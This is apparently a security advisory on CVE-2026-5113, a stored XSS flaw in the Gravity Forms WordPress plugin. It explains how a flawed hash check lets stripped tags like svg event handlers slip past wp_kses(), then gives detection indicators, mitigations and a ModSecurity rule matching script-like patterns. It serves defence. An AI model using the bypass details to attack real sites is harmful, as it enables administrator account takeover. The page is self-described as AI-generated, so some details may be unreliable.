CVE-2026-5113 Overview
CVE-2026-5113 is a Stored Cross-Site Scripting (XSS) vulnerability in the Gravity Forms plugin for WordPress, affecting versions up to and including 2.10.0. The flaw resides in the Consent field hidden inputs, where a state validation mechanism fails open when input passes through wp_kses(). Unauthenticated attackers can inject arbitrary JavaScript that executes in an administrator's browser when they view the Entries List page. This vulnerability is tracked as CWE-79.
Critical Impact
Unauthenticated attackers can inject persistent JavaScript that executes in administrator sessions, enabling account takeover, privilege escalation, and arbitrary actions within the WordPress admin interface.
Affected Products
- Gravity Forms plugin for WordPress, versions up to and including 2.10.0
- WordPress sites with Consent fields enabled in forms
- WordPress administrators accessing the plugin's Entries List page
Discovery Timeline
- 2026-05-02 - CVE-2026-5113 published to NVD
- 2026-05-05 - Last updated in NVD database
Technical Details for CVE-2026-5113
Vulnerability Analysis
The vulnerability stems from a flawed state validation mechanism in the Consent field's hidden input handling. Gravity Forms generates two hashes during validation: one over the raw input and another over input sanitized by wp_kses(). The validation only fails when both hashes diverge from the original state hash. This logic creates a bypass condition that attackers can reliably trigger.
When an attacker submits a payload using HTML tags that wp_kses() strips entirely, such as <svg> elements with event handlers, the sanitized version produces an empty or modified string that aligns with the expected sanitized hash. The raw input retains the malicious payload because the validator does not require the raw hash to match. The plugin then persists the unsanitized consent label to the database.
The second flaw appears at output time. When an administrator loads the Entries List page, the plugin retrieves the stored consent label and renders it without applying output escaping. The browser parses the injected markup and executes the JavaScript in the administrator's authenticated session.
Root Cause
The root cause is a logical OR condition in the state validation routine that should have been a logical AND. By accepting either hash as valid proof of integrity, the validator permits raw input mutations that wp_kses() would otherwise neutralize. Insufficient context-aware output encoding on the Entries List page compounds the issue.
Attack Vector
The attack requires no authentication and no user interaction beyond an administrator visiting the entries page. An attacker submits a public-facing form containing a Consent field, embedding a payload built from tags that wp_kses() removes during sanitization. The payload survives in the database and triggers when an administrator reviews submitted entries.
No verified exploit code is publicly available. Refer to the Wordfence Vulnerability Report for additional technical context.
Detection Methods for CVE-2026-5113
Indicators of Compromise
- Form entries containing HTML tags such as <svg>, <math>, or other elements typically stripped by wp_kses() within Consent field values
- Database rows in wp_gf_entry_meta or related Gravity Forms tables containing JavaScript event handlers like onload=, onerror=, or onclick=
- Unexpected outbound requests originating from administrator browser sessions immediately after viewing the Entries List page
- New administrator accounts or modified user roles created shortly after entry review activity
Detection Strategies
- Audit Gravity Forms entry data for HTML-like content in Consent field columns using SQL queries against the WordPress database
- Deploy Web Application Firewall (WAF) rules that flag form submissions containing <svg, <math, or event handler attributes in Consent field parameters
- Monitor WordPress admin sessions for anomalous DOM activity or script execution within the /wp-admin/admin.php?page=gf_entries context
Monitoring Recommendations
- Enable verbose logging on WordPress for form submissions and review entries periodically for suspicious payloads
- Correlate web server access logs with administrator authentication events to identify post-exploitation activity
- Track plugin version inventory across managed WordPress sites to confirm upgrade status
How to Mitigate CVE-2026-5113
Immediate Actions Required
- Upgrade Gravity Forms to a version released after 2.10.0 that addresses CVE-2026-5113
- Audit existing form entries for stored payloads and purge or sanitize any malicious Consent field values before administrators view them
- Restrict access to the Gravity Forms entries page to a minimum set of administrator accounts
- Reset session cookies and credentials for administrators who may have viewed compromised entries
Patch Information
Gravity Forms has published version updates documented in the Gravity Forms Change Log. Site operators should apply the latest release that supersedes 2.10.0. Verify the installed version under the WordPress Plugins page after the update completes.
Workarounds
- Disable Consent fields across all active forms until the patch is applied
- Deploy a WAF rule that blocks form submissions containing HTML tags or JavaScript event handlers in Consent field inputs
- Temporarily restrict the Entries List page using IP allowlisting at the web server or reverse proxy layer
# Example WAF rule (ModSecurity) blocking script-like content in Gravity Forms input
SecRule ARGS_NAMES "@rx ^input_" \
"chain,phase:2,deny,status:403,id:1026511301,msg:'Potential CVE-2026-5113 XSS payload'"
SecRule ARGS "@rx (?i)(<svg|<math|onerror=|onload=)" "t:none"
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
